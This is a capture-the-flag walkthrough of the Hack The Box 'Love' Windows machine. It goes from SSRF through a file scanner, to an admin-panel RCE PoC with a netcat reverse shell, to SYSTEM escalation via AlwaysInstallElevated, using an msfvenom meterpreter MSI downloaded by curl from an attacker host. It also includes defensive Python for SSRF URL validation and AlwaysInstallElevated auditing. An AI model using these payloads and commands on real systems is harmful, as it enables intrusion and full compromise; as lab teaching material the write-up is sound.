HTB Love Writeup (ENG)


#HTB Writeup Hack Windows English

2021 Oct 05: 17:25

Enumeration

We can add the line 10.10.10.239 love.htb to our /etc/hosts file to make our job easier. First we need to scan the victim, for example with nmap: nmap -sCV -T4 -p- love.htb

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
432/tcp closed iasd
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1 PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1 PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Now we have to scan port 80 for subdomains. We find a subdomain, staging.love.htb, which we add to our /etc/hosts file like before. On this subdomain there is a Demo button that redirects us to beta.php. There we find a file scanner that checks the URL we give it. On http://love.htb:5000 we get permission denied, which means we can try to load that page through the file scanner with SSRF.
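The file scanner reaches whatever URL it is given, which is exactly what lets it be pointed back at port 5000 on localhost. As an added example (my own code, not part of the box or of the original writeup), here is the kind of server-side check such a feature should run before fetching a user-supplied URL: it only allows http/https to ports 80 and 443, refuses IP literals in loopback, private and link-local ranges, and resolves hostnames so that a name pointing at an internal address is refused as well. The resolver mapping and hostnames inside it are constructed for offline use and are assumptions, not the lab's DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allow-list for a server-side "scan this URL" feature: public web
# targets only, the two web ports only, nothing on the host's loopback or LAN.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked_ip(ip_text):
    """True if the address is loopback, private, link-local or otherwise internal.
    Raises ValueError if ip_text is not an IP literal."""
    addr = ipaddress.ip_address(ip_text)
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so it is judged as the IPv4 it hides.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def check_scan_url(url, resolver=socket.getaddrinfo):
    """Decide whether a user-supplied URL may be fetched server-side.
    Returns (allowed, reason). `resolver` has the getaddrinfo signature and is
    injectable so the check can run offline in tests."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # Host given as an IP literal: judge it directly, no DNS needed.
    try:
        if is_blocked_ip(host):
            return False, f"address {host} is internal"
        return True, "ok"
    except ValueError:
        pass
    # Host is a name: resolve it and judge every address it maps to, so a name
    # that points at 127.0.0.1 or the LAN is rejected just like the literal.
    try:
        infos = resolver(host, port)
    except socket.gaierror:
        return False, f"host {host!r} does not resolve"
    for info in infos:
        ip_text = info[4][0]
        if is_blocked_ip(ip_text):
            return False, f"host {host!r} resolves to internal address {ip_text}"
    return True, "ok"


# Constructed offline resolver so the example runs without DNS; the mapping is
# invented for illustration and is not the lab's real DNS.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "love.htb": ["10.10.10.239"],
    "public.example": ["203.0.113.10"],
}


def fake_resolver(host, port):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"unknown host {host}")
    return [(None, None, None, "", (ip, port)) for ip in FAKE_DNS[host]]


if __name__ == "__main__":
    for candidate in ("http://localhost:5000", "http://localhost/", "http://love.htb/",
                      "http://[::ffff:127.0.0.1]/", "http://public.example/"):
        print(candidate, "->", check_scan_url(candidate, resolver=fake_resolver))
```

Validating after resolution matters because a name can point at 127.0.0.1 as easily as the literal does. To close the remaining rebinding window, the fetcher should connect to the address this check validated rather than resolving the name a second time, and it should apply the same check to every redirect it follows.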

Getting User

We need to give the http://localhost:5000 URL to the input field. Now we have access to port 5000 and can see the admin's credentials, and we can log in at http://love.htb/admin/ with them. With the voting system's administrator account we can use an RCE vulnerability; on Exploit-DB there is a PoC script for it. After downloading it we need to change some things before we run it. The beginning of the script should look like this:

IP = 'love.htb' # Website's URL
USERNAME = 'admin' # Auth username
PASSWORD = '@LoveIsInTheAir!!!!' # Auth password
REV_IP = '10.10.14.209' # Reverse shell IP
REV_PORT = '4343' # Reverse port
# --------------------------------
INDEX_PAGE = f'http://{IP}/admin/index.php'
LOGIN_URL = f'http://{IP}/admin/login.php'
VOTE_URL = f'http://{IP}/admin/voters_add.php'
CALL_SHELL = f'http://{IP}/images/shell.php'

We need to start a TCP listener, for example rlwrap nc -lvnp 4343 . After this, run the script; in the listener we get a reverse shell as phoebe. In the C:\Users\Phoebe\Desktop directory there is user.txt, which we can read with the type user.txt command.

Rooting

We have to check whether we have the privilege to install .msi packages. The necessary commands:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

In both outputs we see 0x1, so the AlwaysInstallElevated policy is on and we can install .msi packages with elevated privileges. Now we have to generate a reverse shell with msfvenom and start a listener with msfconsole. To generate the reverse shell:
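Both values have to be 0x1 for this to work: Windows Installer honours AlwaysInstallElevated only when the HKLM and the HKCU value are both set. As an added example (my own code, not from the writeup), the following Python reads the output of the two reg query commands above, decides whether the policy is effective, and produces the reg add commands an administrator would run to turn it off. The sample output embedded in it is constructed to match the 0x1 case seen on the box, plus the error reg query prints when the value is absent.

```python
import re

# Constructed sample output of the two reg query commands above; both hives
# report 0x1 here, as seen on the box. Real output varies per host.
SAMPLE_REG_OUTPUT = {
    "HKCU": r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
""",
    "HKLM": r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
""",
}

# Constructed output for the healthy case: reg query reports an error when the
# value does not exist.
MISSING_VALUE_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-f]+)\s*$", re.I | re.M)


def parse_always_install_elevated(reg_query_output):
    """Return the DWORD as an int, or None if the value is not present."""
    m = VALUE_RE.search(reg_query_output)
    return int(m.group(1), 16) if m else None


def assess(hkcu_output, hklm_output):
    """Combine both hives the way Windows Installer does: the policy is only
    honoured when BOTH the machine and the user value are non-zero, and an
    absent value behaves as 0."""
    hkcu = parse_always_install_elevated(hkcu_output)
    hklm = parse_always_install_elevated(hklm_output)
    effective = bool(hkcu) and bool(hklm)
    return {"hkcu": hkcu, "hklm": hklm, "always_install_elevated": effective}


def remediation_commands():
    """reg add commands that set both values to 0. The Group Policy equivalent
    is 'Always install with elevated privileges' under Windows Installer."""
    key = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
    template = "reg add %s\\%s /v AlwaysInstallElevated /t REG_DWORD /d 0 /f"
    return [template % ("HKLM", key), template % ("HKCU", key)]


if __name__ == "__main__":
    result = assess(SAMPLE_REG_OUTPUT["HKCU"], SAMPLE_REG_OUTPUT["HKLM"])
    print("AlwaysInstallElevated effective:", result["always_install_elevated"])
    if result["always_install_elevated"]:
        print("Remediate with:")
        for cmd in remediation_commands():
            print(" ", cmd)
```

Checking both hives together is the point: a host where only HKLM is set is not exploitable this way, so an audit that alerts on either value alone produces noise, while one that alerts on the combination finds exactly the hosts where a standard user's .msi runs as SYSTEM.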

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f msi > shell.msi

When it's done we have to move the file to the victim's machine, for example with python3's built-in web server. In the directory where shell.msi is: python3 -m http.server 8080 . In the reverse shell we need to download it and run it.

curl http://<ATTACKER_IP>:8080/shell.msi -o shell.msi

Next, start the listener with msfconsole on our local machine.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <ATTACKER_IP>
set lport 4444
exploit

Now go back to the reverse shell as phoebe and run the .msi file like:

msiexec /quiet /qn /i shell.msi

In the msf listener we shall see something like this:

[*] Started reverse TCP handler on 10.10.14.209:4241
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.209:4241 -> 10.10.10.239:63558) at 2021-06-01 17:41:54 +0200
meterpreter >

With the getuid command we can see our user is NT AUTHORITY\SYSTEM, so we have permission to read root.txt. This file is located in the C:\Users\Administrator\Desktop directory.

Happy hacking!